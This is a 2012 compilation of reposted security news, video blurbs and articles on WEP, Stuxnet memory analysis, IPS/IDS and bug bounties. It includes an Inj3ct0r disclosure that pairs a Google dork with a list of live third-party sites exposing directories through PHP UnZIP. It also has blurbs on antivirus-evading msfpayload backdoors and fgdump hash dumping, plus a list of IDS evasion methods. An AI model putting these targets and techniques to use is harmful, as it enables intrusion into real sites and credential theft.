Wubi

Nowadays pretty much everyone uses wireless networking from your smart phone to your home and/or business networks. There are many security issues with wireless networking; the one that I see the most is security carelessness of some ISP’s contractors and installation personnel. ISP based WEP Vulnerability: I have noticed from work and personal experience a preventable ISP (Internet Service Provider) based WEP vulnerability that can be prevented through security training in wireless networking on the ISP’s end of things. Some ISP’s still uses the old and unsecure version of WEP (Wired Equivalent Privacy) with an easy to crack password. Can you guess what it is? Still don’t know? Ok your phone number associated with your ISP account which when entered could be entered as an example 3105556666 or 6666555013, that’s right either, forward or backward. Your probably asking yourself, why is this insecure? Good question, the answer is simple; most if not all hackers and leecher’s know the ISP’s that use this method of a quick insecure setup and all it takes is a little cyber tracking to find out all of the phone numbers associated with that address and then try them forward and backward. If a black hat hacker gets into the router problems can occur, such as being locked out of your router, hijacked internet traffic and even network infiltration which includes any computers on that network. There is also the risk of ID Theft as well that can come from either the network infiltration or through the cyber tracking part of the attack. What is WEP? Wired Equivalent Privacy: WEP is a security protocol based in 64 or 128 bit encryption for your network. It was one of the first wireless encryption protocols. It is extremely unsecure, easily cracked. WEP when it first came out was the start of a great idea but since then it has been replaced by WPA which was replaced with WPA2-P2K (WPA2-Personal) and WPA2-Enterprise which are more secure than WEP. WEP can also be replaced with VPN (Virtual Private Network) and other various protocols. ISP Responsibilities: As for the ISP’s using this insecure but easy setup I would like to make a suggestion. Please train your technicians and contractors in cyber security techniques and procedures to prevent unwanted activity on both your clientele’s wireless networks. I’m not sure if this has become a law yet or not as I could not find anything on it, but the ISP should be using good risk management procedures which include training their employees and as such the contractors in wireless and wired security. An ISP’s responsibility should be to their clientele’s security and well-being but from what I have seen there are some that have chosen not to make it a priority and it shows unfortunately like an ink blot on a bright white shirt. Security Training for ISP Personnel and Contractors: Basic internet users that want to click and go are defiantly at risk of this vulnerability and are easily caught up in the ploy by certain ISP’s and their contractors. I ask that you the reader please do not get my words wrong; this is not a conspiracy to hurt certain ISP’s consumers but rather a lack of security training and knowledge. This brings me to my main point of ISP’s training their field crews as well as using contractors trained in security procedures so as to secure their clienteles home and business wireless and wired networks. Where I live we have three main ISP’s two of which use the much more secure WPA2-PK2 encryption protocols. For these two ISP’s the encryption key is on the wireless router itself, but for the third the contractors they use don’t understand the security ideology behind the WEP, WPA, WPA2-Personal, or the WPA2-Enterprise based encryption. I have heard many stories from different clientele as well as a personal experience before I got into the security game. In all of the accounts the story is much the same as the next, what they have heard from the contractor for this ISP is that “the WEP key used is just to logon to the internet service which is why the telephone number is used”. This is true in a sense but in all reality highly unsecure, the real reason for using an encryption key such as WEP, WPA, WPA2-Personal, or WPA2-Enterprise is to keep unauthorized individuals from using your wireless signal to gain access to the internet and your network. I am not trying to say the ISP or its employees are evil black hat lovers but just the opposite, they are more like an average user who just wants to get up and go and not concerned about security. This is where security training for the contractor installation personnel as well as the ISP installation personnel would really pay off in the long run. First the misconception of the WEP encryption key would be stopped. Second the user could be instructed in basic wireless security procedures. Third the users home or business network would be a lot safer than it would be if the ISP was to not train their contractors and personnel. Why is using WEP inadvisable especially with a key as simple as the users phone number? Well WEP is one of the oldest versions of encryption for a wireless network and has since become easily cracked by both leecher’s and hackers alike. Some people may say that hackers are in it for the challenge why would they waste their time with a simple WEP crack especially if they know the ISP uses the user’s phone number? At this time I would like to welcome you to the “lifestyles of the hackers of cyber tracking”. What is cyber tracking and how can it be used to find a WEP key? Well, cyber tracking is kind of like stalking your prey in the field but instead of attacking them right off you get to learn everything about them from the public information to the very deep secrets of the users. That’s the challenge. How to stop the Leechers! You may ask what are the symptoms of someone leeching off my network? The symptoms for the network can be the same as a network aware worm such as conficker, SQLslammer, IRCBots; minor to major network slowdown (this all depends on how many leeches you have connected to your wireless network), unknown IP Addresses showing up in the router logs, on rare occasions if you get too many leeches the network may crash. If you have one leech on your network it’s guaranteed that there are more around sucking the bandwidth from the network. You may be asking, why are they called leeches? The answer is simple, in swamps there are little worm like creatures called leeches that attach themselves to your skin and suck your blood, they are also used as a natural blood letting solution to get rid of an infection. As with the worm like leeches internet leeches also drain you of precious bandwidth should they attach themselves to your network. Usually a leech is an individual that wants the internet but refuses to pay for internet services. It could be a teenager up to an adult that wants to get free internet. WEP vs. WPA2-Personal Question: Here is a fun question for the readers of this post; I would love to see what you ladies and guys have to say about this. If a hacker were to choose a wireless hit to gain access to a target system which one do you think they would want to hit and why? Sursa: InfoSec Resources – Protect Your Wireless Network from Leechers and Hackers

Description: In this video you will learn how to attack on a computer using different - different technic and backdoors. So in this video he will cover all great attacks like Arp PoisingDNS spoofingNetwork SniffingBuilding an illicit serverDropping Malicious PayloadsAttacking The WLANHash Cracking with JTRAdvance Linux command lineAdvance Metasploit options Auto-pwnage with Metasploit resource scriptsMaintaining the "Man-in-the-Middle" position etc. .. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: In this video you will learn how to analyst Stuxnet worm using tool called Volaitllity. Volatillity : - The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independent of the system being investigated but offer unprecedented visibilty into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and provide a platform for further work into this exciting area of research. Stuxnet : - Stuxnet is a computer worm, that malware found in June 2010. This worm tagets only Microsoft Windows. Hackers created this Stuxnet for attacking on industrial systems. Stuxnet - Wikipedia, the free encyclopedia https://www.volatilesystems.com/default/volatility Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Nationwide customers hit by double-debit glitch | ZDNet Summary: Money has been taken twice from an as-yet unknown number of Nationwide customers accounts, according to reports on Twitter. Nationwide is investigating the issue By Tom Espiner | July 26, 2012 -- 12:17 GMT (05:17 PDT) A technical problem with Nationwide debit transactions has seen some money taken twice from customer accounts, according to complaints on Twitter. Nationwide admitted on Twitter that customers were having debit transaction problems, but had not indicated the scale of the glitch at the time of writing. Nationwide is looking into reports of a glitch that has seen money taken twice from some customer accounts. Image credit: Nationwide "We are aware of debit card transaction issues affecting only some of our customers," a Nationwide spokeswoman told ZDNet on Thursday. Nationwide is working to resolve the issue as soon as it can, the spokeswoman added. A number of organisations and individuals took to Twitter to report incidents. Payments made over the last three days may have been taken twice, SME support organisation Cambridgeshire Business Support said in a tweet. The Nationwide problems come a month after competitors RBS, Natwest and Ulster Bank were hit by a batch-processing glitch. Sursa: Nationwide customers hit by double-debit glitch | ZDNet

Security nous lacking in cloud app development | ZDNet Summary: Hewlett-Packard exec says developers' poor grasp of security practices when building cloud-based enterprise software could lead to code having loopholes hackers can exploit. By Jamie Yap | July 26, 2012 -- 10:53 GMT (03:53 PDT) The maturing cloud computing trend has spurred more enterprise applications to be built for access via the cloud network, but one Hewlett-Packard executive argues that developers have yet evolved in tandem with regard to putting security at the forefront of their processes. Matt Bertram, chief technologist of software at HP Asia-Pacific and Japan, pointed out that coding a secure app for enterprise use is both a challenge to overcome and a major pitfall to avoid for many IT departments. Developers of traditional enterprise software obviously have coding knowhow, but many may not be aware of security best practices for cloud-based applications and this may leave loopholes in the code that hackers may exploit, he said in an interview on Thursday. Bertram noted that security is an oft-quoted concern among companies as to why they have no plans to migrate to the cloud. So this lack of awareness on cloud-based security on the developers' end is all the more pressing, particularly with hackers seemingly moving from attacking corporate networks to targeting the applications itself, he explained. With cloud computing thrown into the software development mix, he acknowledged that coding becomes more complex. Security comes in multiple levels and would move away from just securing the network perimeter to focusing on how to safeguard the application from external threats, he said. The core elements to app development, such as performance, quality, resilience, and security remain the same, but ensuring these are not compromised becomes ever more important when developing an app for a cloud environment, the HP executive stressed. This is because such apps would be more visible and exposed than internal ones, and should breaches occur, the negative impact on the business would be seen and felt more keenly, he explained. Furthermore, for apps with "cloud-bursting" capabilities, developers would need to build apps that are "smarter" and selective in matching infrastructure resources with the business activities' needs, he noted. Cloud bursting generally refers to an application tapping on additional compute power--either from reserve internal resources or from third-party public cloud providers--after existing capacity provisioned for the software has been exhausted. Vigilant code checking, testing important This is why it is important to implement security measures early on during the code writing stage, as well as carry out security testing or troubleshooting earlier in the application lifecycle, Bertram suggested. Increasing one's security awareness does not mean just writing good code, but being able to identify and correct badly written ones at earlier stages too, the HP executive said. The IT vendor, for one, has tools that can help scan the code of enterprise applications to weed out poorly written ones that increases the likelihood of a security breach, he added. He also called on developers to increase their collaboration with the security community, which would help them in writing their apps more securely. All said, Bertram believes enterprises will increasingly pay attention to designing applications that are optimized for the cloud, given that more of them have finished virtualizing their IT infrastructure. "It's a logical progression. After infrastructure has been sorted with virtualization, automation, and self-service, the game now is building and delivering innovation the business via applications," he stated. Sursa: Security nous lacking in cloud app development | ZDNet

Carly Rae Jepsen nude photos stolen by hackers | Naked Security by Anna Brading on July 26, 2012 # Hey, i don't know you And this is crazy But i've nicked your photos I've hacked you baby # Carly Rae Jepsen - yes, her of the "Call Me Maybe" (potentially one-hit-wonder) song-of-the-year-so-far - has lodged a complaint to the Vancouver Police Department after allegedly having naked photos stolen from her personal computer. According to TMZ, Jepsen went to the Vancouver Police Department about a possible hacking situation back in March. Const. Lindsey Houghton from the Vancouver Police Department confirmed: "We began an investigation. That investigation is into the unauthorized use of a computer, theft of telecommunications and the criminal harassment of Miss Jepsen." "At this time, one suspect — an adult male — has been identified. He has not been arrested, he has not been charged and the investigation is continuing." Poor old Carly, it was only on Monday when she took to Twitter to deny that a sex video of someone who looked remarkably like her was actually, in fact, not her. "Crazy morning. Discovered that someone put up a sex tape claiming to be me. Ridiculous. Obviously not me." And now she joins the likes of Scarlett Johansson, Mila Kunis, Christina Aguilera, Lady Gaga and Miley Cyrus who have also all fallen victim to cybercriminals. Celebrities may have chosen to be in the public eye, but they deserve some level of privacy, especially when it comes to private files stored on their personal computers. But, like the rest of us, they are capable of being a bit neglectful when it comes to computer security. So, celebrities, if you're reading this - if you must take naked pictures of yourself, at least store them securely. Or perhaps take the advice that we gave Mila Kunis. Sursa: Carly Rae Jepsen nude photos stolen by hackers | Naked Security

Facebook to offer bug bounty to hackers who find flaws in its systems | ZDNet Summary: Several companies already reward 'white hat' hackers who responsibly report flaws in their web services, but Facebook is apparently going a step further with payments to those who find vulnerabilities in their internal systems By David Meyer | July 26, 2012 -- 08:58 GMT (01:58 PDT) Facebook and Google have for some time offered bounties to hackers who find vulnerabilities in their public-facing systems, but now the social network has gone a step further by offering to reward hackers who find and report flaws in Facebook's corporate network. According to a Bloomberg report on Thursday morning, the move will be announced at the DefCon hacking conference. "If there's a million-dollar bug, we will pay it out," Facebook security response chief Ryan McGeehan was quoted as saying. The idea of a company paying so-called 'white hat' hackers to probe their sites and report flaws — rather than exploiting them — is rare, but far from new. Google and Facebook do it, as do Mozilla, HP and, as of last month, PayPal. However, rewarding people for breaking into internal systems is an even riskier proposition. According to the Bloomberg piece, Facebook was moved to introduce the new bounty scheme after an external researcher informed the company of a flaw that meant outsiders could listen in to their internal conversations. Facebook's bug bounty page says the company will pay a minimum of $500 for each responsible disclosure, as long as the bug could "compromise the integrity of Facebook user data, circumvent the privacy protections of Facebook user data, or enable access to a system within Facebook's infrastructure". The only kinds of bugs that Facebook won't pay out for are those in third-party apps or websites, denial-of-service vulnerabilities, and spam or social engineering techniques, none of which Facebook has any control over. Sursa: Facebook to offer bug bounty to hackers who find flaws in its systems | ZDNet

July 26, 2012 By Mayuresh Our first post regarding the Volatility Framework can be found here. An update – Volatility Framework version 2.1 RC3 – was released a few hours ago! Changes made to Volatility Framework: Prevent the ‘NoneObject as string’ warning when using regex with dlldump and moddump Added pas2vas for linux and windows. Added tests for Volatility Framework PFN modules. Started implementing yara discontiguous scanner. Fixed some Vad info bugs in the Volatility Framework. Added a single binary memory imager console application which unpacks the correct driver and takes an image. Fixed vaddump to write sparse output files in order to handle extremely huge vad mappings with no backing (see issue 306). Add a Length property to MMVAD to reduce confusion over the purpose of vad.End and minimize the chance of off-by-one errors when calculating vad lengths. Add scudette’s BaseYaraScanner, VadYaraScanner, and DiscontigYaraScanner to malfind.py. this fixes yarascan on x64 kernelmode. the EPROCESS.get_vads() API changes a bit. it results in greater speed when using ldrmodules because only the first 2 bytes are needed instead of the whole vad region. also a new method VADDump.dump_vad is added which aims to write vads to a file in small chunks rather than building a large buffer in memory, which can exhaust/consume the analysis system’s RAM. Make sure we don’t use the same variable for different things in malfind BaseScanner. Apply a remedy for issue 306 – vaddump on wow64 processes with MM_MAX_COMMIT. We don’t want to dump these multi-terabyte ranges with no valid pages. Bring back the ability for malfind to ignore VADs whose entire region is either unavailable due to paging or all 0?s…this was lost in r2077 because we avoided reading the entire range into memory at once. Fix an off-by-one error in the impscan plugin. use the new vad.Length property added in r2076 Add a comment to yarascan which explains why module lookups will fail when operating in kernelmode on x64. It’ll be a known issue of the plugin for 2.1, after which time we’ll update trunk’s Pointer.v() and be able to test more thoroughly before a release Added command lind argument parsing for backwards compatibility with the old Volatility Framework. Added threadscan and modscan again. Added tests for yarascan. Ported the netscan module to the new Volatility Framework. Updated documentation to winpmem binary and cleaned up the code a bit. Removed empty directory. Until we can fix the Pointer.v() 48-bit truncation globally, fix the yarascan module resolution on x64 by supplying it with a private version of find_module that does the truncation Bump to rc3 bceause of the Pointer.v() fix for yarascan. Download Volatility Framework: Volatility Framework 2.1 RC3 - volatility-2.1-rc3.tar.gz/volatility-2.1_rc1.win32.exe Sursa: Volatility Framework 2.1 version RC3! — PenTestIT

In the past few years, advancements in technology have grown hand in hand with a substantial increase in hacking and cyber espionage. The whole world is deeply interconnected through the medium of the Internet, and one vulnerable machine can be the gateway to a series of undesirable events. The motivation for such events could be anything from financial gain, to political statements, or simply for fun. But for the victim of such an attack, it might cause a much more significant loss than intended. For example, a technology company whose website is successfully hacked results in the loss of reputation, which is certainly very crucial for any company. Enterprises, governments, and even individuals face this problem on a daily basis without knowing how to deal with it. So what is a solution that could help considerably reduce, if not eradicate, this threat? The answer is the implementation of an intrusion prevention system (IPS). An IPS can be understood as a security mechanism that monitors a network and/or system for any malicious action and tries to prevent it. As explained on Wikipedia (Intrusion prevention system - Wikipedia, the free encyclopedia) the core functions of an IPS are: Identify malicious activity Log information related to such activity Attempt to block/stop such activity Report the activity Often, an intrusion prevention system (IPS) is confused with an intrusion detection system (IDS), but in reality an IPS can be considered an extension of IDS. They do have some features in common like traffic monitoring, observing system activity, creating log etc., but what makes an IPS different from an IDS is the IPS’s ability to prevent/block any detected intrusion attempt. Differences between IPS and IDS: IPS It provides an active prevention security solution. An IPS sits in-line with the network traffic flow. Core function is to prevent an intrusion. An IPS slows down the traffic (analysis time). Example: SNORT IDS It provides a passive detection security solution. An IDS generally does not sit in-line (although it can) with the network traffic flow. Primary purpose is monitoring and reporting of any malicious activity. An IDS does not affect the traffic. Example: OSSEC HIDS Because of the services provided by an IPS, it is also known as an intrusion detection and prevention system (IDPS). Basically, an IPS sits in-line with the network traffic and monitors it. Through analysis of intrusion signatures, generic behavior, and heuristic methods, it looks out for any malicious action on the network/system and takes the appropriate action of dropping the packet and/or blocking the specific traffic. It further sends an alert to the administrator when any such event occurs. Intrusion prevention systems can be classified as: Network intrusion prevention system (NIPS): This type of IPS is placed at specific point(s) on the network to monitor the entire network for any malicious traffic and attempts to stop it. Host intrusion prevention system (HIPS): A host intrusion detection system is implemented on individual hosts (or devices) to monitor the inbound and outbound traffic for that specific host/device and perform the required action after detecting any malicious activity. Network behavior analysis (NBA): This kind of IPS inspects the traffic for suspicious or unusual flow that could lead to an attack like DoS/DDoS. Wireless intrusion prevention system (WIPS): This monitors the wireless network for malicious behavior. Some common types of threats that an IPS usually is capable of handling: DoS/DDoS attack: An attack that aims to make a service unusable for legitimate users by flooding the service with a huge number of connection requests. ARP spoofing/poisoning: ARP stands for address resolution protocol, which is utilized to find a MAC address when the IP is known in a local network. If successful, this kind of attack allows the attacker to intercept all the traffic between two hosts. SSL evasion: Most new IPSs are capable of stopping attacks on the SSL protocol. Port scanning: Generally IPSs are capable of stopping any attempt to find which ports are open on specific hosts. OS fingerprinting: During the recon phase of an attack, one of the most important tasks is to identify a target machine’s operating system so that specific exploits can be launched to compromise that machine. Modern IPSs are capable of detecting and stopping any such attempt. Buffer overflow: This is one of the most widely exploited attacks that can lead to total system compromise. This can be handled by an advanced IPS. An IPS generally utilizes the follow detection methods: Signature based threat detection: An IPS contains a huge repository of attack signatures from known exploit/vulnerability patterns and utilizes these to detect any attempt at intrusion. If a match is found based on the signature, suitable action is taken by the IPS to prevent the attack. Anomaly based threat detection: This detection method uses the baseline established by average network traffic conditions and compares current traffic conditions with that baseline to identify any abnormal or unsafe behavior. If any such activity is found, the IPS takes the appropriate action to safeguard against it. This technique can provide a defense against unknown threats. Stateful protocol analysis detection: This methods looks out for difference in the protocol states as compared to standard predefined profile. Passive monitoring: In this technique the IPS simply sits and monitors abnormal or suspicious behavior, such as unusual amount of traffic from the same IP address (attempt of DoS), and takes the required action against it. An IPS must not be confused or mistaken as a substitute for another network security measure, namely: the firewall. The job of a firewall is to limit access to a network/system, and it is generally not capable of detecting and preventing an intrusion. Firewalls basically work based on filtering rules, whereas an IPS uses signature-based threat-detection (and many other techniques) to safeguard the network/system. A firewall’s job is to allow or block traffic, whereas an IPS’s job is to determine if there is something malicious in the traffic allowed by the firewall. An IPS is usually deployed behind a firewall on a network. Neither of these two tools should be considered a replacement for the other; instead, they must be deployed in conjugation with each other to implement defense in depth. Some of the best tools of the trade are described below: The first free and open source NIDPS (network intrusion detection and prevention system) is called as Snort. Originally released by Martin Rosh (Sorcefire founder and CTO) in 1998, Snort has become one of the most deployed IDPS. Snort can perform real time analysis of the traffic and logging of the packets on an IP network. It analyses the protocol, searches/matches the content, and is capable of detecting different kinds of attacks described earlier in the article (port scanning, OS fingerprinting, buffer overflow, etc.). The latest version of the application can be downloaded from http://www.snort.org/snort-downloads/. Figure 1 shows a standard example of the Snort interface. Figure 1. Snort Interface Snort has three primary uses: Packet sniffer: Read and display network packets. Packet logger: Logs the packets to the disk, which can be used for network traffic debugging. Intrusion prevention system (IPS): Monitors and analyses the traffic based on the predefined rule-set and performs the specified action. Snort rules are at the core of the detection of any intrusion attempt. They can be defined as: The approach to perform detection. Snort rules are defined based on vulnerabilities, unlike signatures, which are based on exploits and can be bypassed by modifying the exploit. Figure 2 shows the output of the packet dump mode. Figure 2. Snort packet dump output Next in the list is another free and pen source tool called OSSEC. OSSEC is a host-based intrusion detection system, but that’s not all; it also contains aspects of a log monitor and security information and event manager (SIM/SIEM), which makes it a unique tool in its arena. A security event manager can be understood as a tool which can be used on huge data network with the aim to centralize the storage and interpretation of events/logs that are generated by other applications. OSSEC is capable of performing: Log analysis Registry monitoring File integrity check Rootkit detection Real-time alerting Active response OSSEC can be easily implemented across multiple platforms such as Linux, Mac, Windows, BSD, VMware ESX, etc. OSSEC contains a cross platform architecture that allows it to monitor and manage multiple systems easily through a centralized management server. It can easily be integrated with an existing system to perform centralized event reporting. Figure 3 shows the initiation of OSSEC. Figure 3. OSSEC initiation OSSEC contains a manager, which is the center of the deployment. It stores and performs all the functions and hence, acts as a server. Agents are installed on the machines that need to be monitored. Agents send the information in real-time to the manager for the purpose of analysis. OSSEC allows performance integrity checks on devices that do not allow installation of the agent such as routers, firewalls, etc. OSSEC agents can also be installed on a virtual machine (VMware ESX) and can help monitor the virtualization platform. Figure 4 displays the output log. Figure 4. OSSEC output log Last in the list is Honeyd, which is also an open source program. It is not actually an IPS/IDS but a honeypot which allows its user to set up virtual hosts. These virtual hosts can act as decoys for attackers and distract them from legitimate systems. They can also help to catch attackers after distracting them from the intended target. Figure 5 shows the Honeyd interface. Honeyd in action is displayed by Figure 6. Figure 5. Honeyd interface Figure 6. Honeyd in action Some IPS/IDS evasion techniques as explained on Wikipedia (Intrusion detection system evasion techniques - Wikipedia, the free encyclopedia) are: Obfuscating attack payload: Encoding the payload of the attack in a manner such that the target machine will be able to reverse it but the IPS/IDS will not. Polymorphic code: Creating the same attack in different (unique) forms so that the IPS/IDS does not detect it. Packet fragmentation: Breaking the attack payload into many small packets so that the IPS/IDS is not capable of reassemble them to detect the attack. Overlapping fragments: Crafting a series of packets with overlapping TCP sequence number. Traffic insertion at the IPS/IDS: Sending packets crafted with TTL (time to live) such that it only reaches the IDS/IPS. Denial of Service/Distributed Denial of Service (Dos/DDoS): Exploiting a vulnerability/bug the IPS/IDS can be flooded with traffic overloading all its computational resources, which will make it unusable. One tool that needs to be mentioned here is fragroute. Fragroute is a tool that is capable of intercepting, modifying, and rewriting outbound traffic for specified host. The capabilities of this tool make it one of the standard tools used for IPS/IDS evasion. The latest version of the tool (i.e. frageroute-1.2.5-ipv6) is compatible with IPv6 networks. The tool can be downloaded from Downloads - fragroute-ipv6 - ipv6-enabled fragroute - Google Project Hosting. The non IPv6 version can be found at fragroute. Figure 7 shows the frageroute interface. Figure 7. Fragroute interface Conclusion: Today there are many technologies present in the market designed to safeguard systems/networks from being attacked and to prevent data loss. From firewalls to anti-virus to encryption systems etc., there are many protective measures we can use to hide our precious data. Yet even with the plethora of security technology, we have to face intrusion events and worry about our data being stolen. The main source of such occurrences is the lack of awareness among common people and even people who are supposed to look after our data. People confuse different security measures and consider one a substitute for another, which can lead to data compromise. Intrusion detection and prevention systems provide us with the first line of defense against malicious intruders. We must not consider an IPS as a substitute for IDS (it’s a different case if the same tool provides all the functions of both tools). IPS and IDS provide the control and visibility required by any enterprise to protect its infrastructure from being attacked and taken over. One of the most important factors to take into consideration when utilizing an IPS/IDS is: proper inclusion into the infrastructure through deployment. Improper deployment will lead to a huge slowdown of the network and improper management. Some best-practices that should be followed regarding IPS/IDS: Identify and prioritize risk areas for proper deployment. Ensure complete coverage of the network. Plan appropriate incidence response in case an intrusion is detected. Awareness and training for the staff. Sursa: InfoSec Resources – Intrusion Prevention System: First Line of Defense

<><>--| INFO |--<><> Author : TAURUS OMAR Category : Webapps / 0day Title Exploit : PHP UnZIP v0.1 - Full Disclosure Vendor : PHP UnZIP v0.1 URL Vendor : PHP Concept Google Dork : intext:"PHP UnZIP v0.1" or inurl:unzip.php?dir=/ 0day exploits : 1337day.com Inj3ct0r Exploit DataBase 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ========================================== 1 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1 1 ========================================== 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 | | | C _:_ A | PHP UnZIP v0.1 - Full Disclosure | C _:_ A | -------------------------------------------------------------------------- +----------------| ABOUT ME |--------------------+ NAME: TAURUS OMAR - LINE: INDEPENDENT SECURITY RESEARCHER - HOME: ACCESOILEGAL.BLOGSPOT.COM - TWITTER: @omartaurus - E-MAIL: omar-taurus[at]dragonsecurity[dot]org - E-MAIL: omar-taurus[at]live[dot]com - PWNED: #ZUUUUUUUUUU - +------------------------------------------------+ <><>--| INFO |--<><> Author : TAURUS OMAR Category : Webapps / 0day Title Exploit : PHP UnZIP v0.1 - Full Disclosure Vendor : PHP UnZIP v0.1 URL Vendor : http://phpconcept.com/ Google Dork : intext:"PHP UnZIP v0.1" or inurl:unzip.php?dir=/ 0day exploits : 1337day.com Inj3ct0r Exploit DataBase <><>--| SAMPLE |--<><> http://inforchile.cl/unzip.php?dir=/ http://www.websites4testing.com/unzip.php?dir=/ http://test.designschemers.com/schemerspress/unzip.php?dir=/ http://www.townsendsorghum.com/shop/images/unzip.php?dir=/var/softaculous http://mviet.comeze.com/unzip.php?dir=/home/a3642042 http://clients.reederweddings.com/ordersystem/galleries/unzip.php?dir=/ http://rezarss.com/unzip/unzip.php?dir=/home ----------------- GREETZ ----------------------- - 0X004N1 TEAM ALL MEMBERS - - MR.PACK - MROBERTS- UR0B0R0X - NEPTHYS BLESS - - http://0x004n1.16mb.com/ - ------------------------------------------------ # 1337day.com [2012-07-26] Sursa: PHP UnZIP v0.1 - Full Disclosure | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

Singaporeans lack good online hygiene | ZDNet Summary: Country's citizens tend not to change passwords or vary them for different online accounts, among other bad Web hygiene practices. By Ellyne Phneah | July 26, 2012 -- 07:50 GMT (00:50 PDT) Singaporeans are not doing enought to keep their online accounts safe, such as using unique passwords, changing passwords regularly, and the use of two-factor authentication (2FA), according to a survey by Assurity Trusted Solutions. Released Thursday, the survey showed 60 percent of respondents who file their tax returns online and 59 percent who use other government services do not change their passwords. Some 45 percent participants also do not have different passwords for all their online accounts, it said. Of those who use online banking services, 10 percent change their passwords quarterly as recommended, while 52 percent never change their passwords. As for online security traders, 9 percent change their passwords quarterly and 54 percent of them never do. "Good cyber hygiene practices are generally lacking across the board," Chai Chin Loon, chief operating officer (COO) of Assurity, noted in a statement. The company is a wholly-owned subsidiary set up by Singapore's IT regulator Infocomm Development Authority of Singapore (IDA) to oversee the running of the National Authentication Framework (NAF). Its survey polled 346 Singaporeans during a roadshow between Apr. 2 to Apr. 4 this year. Make 2FA a way of life The survey also showed 68 percent respondents indicating that someone hacking into their financial information is their topmost concern when performing an online transaction. This was followed by identity theft at 45 percent, and private information made public at 44 percent. These concerns could be why 74 percent of those polled acknowledged 2FA to be an important element of an ideal security process for users, it added. Chai said: "Clearly the failure to activate 2FA is not due to a lack of awareness. End users should activate 2FA whenever possible to strengthen their online security." He added consumers who conduct online banking are already more vigilant against cybercrime than other consumer demographic. However, the COO stressed that educating users to make 2FA a way of life for sensitive online transactions such as e-mail, social networking, accessing online health records, and financial information, should continue to be a priority. Last week, IDA revealed plans for an open tender to attract more operators to provide 2FA services for public sector agencies, which is part of its wider strategy to drive 2FA adoption in the country. Sursa: Singaporeans lack good online hygiene | ZDNet

BackTrack 5 - MSFPayload'da Birden Fazla Encoder Kullanmak Description: In this video you will learn how to create a backdoor using multi encoder msfpayload backdoor. What exactly we are going to do that before that we are encoding a backdoor using only one encoder so in this video you will see how to encode your backdoor using three encoders or more then that. Now I think it is hard to detect by AVs if still detected by AVs so use Hex editor and changes some value if you have done before this. This is pretty good new tricks, try it. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: BackTrack 5 - MSFPayload'da Birden Fazla Encoder Kullanmak on Vimeo

Description: In this video you will learn how to crack windows password using command prompt in windows so first you need to download tool called FGDUMP and follow the video after using this tool you will receive all users hashes. This is good trick, that you don’t want to use some live cd or something else. FGDUMP : - FGDUMP is a a very easy to use windows based hash cracker tool. But you can use this tool only in windows command prompt. Here I have posted some uses of that tool. fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}] where Username and Password have administrator credentials -? displays help (you're looking at it!) -t will test for the presence of antivirus without actually running the password dumps -c skips the cache dump -w skips the password dump -s performs the protected storage dump -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist. -v makes output more verbose. Use twice for greater effect -k keeps the pwdump/cachedump going even if antivirus is in an unknown state -l logs all output to logfile -T runs fgdump with the specified number of parallel threads -h is the name of the single host to perform the dumps against -f reads hosts from a line-separated file -H reads host:username:password from a line-separated file (per-host cr edentials) -o skips pwdump history dumps -a will not attempt to detect or stop antivirus, even if it is present Foofus.Net Security Stuff - Foofus.Net Advanced Security Services Forum Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: r00tw0rm Team release a new tool today, called "Sensitive Buster" and Coded by Th3breacher And Angel Injection. The Tool finds vulnerabilities On WebServer ,Admin panels, sensitive files and folders and even backups. The Tool Coded by Python Language And it's Open Source Every One Can Edit it. Visit: [in]Seguridad Informática Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

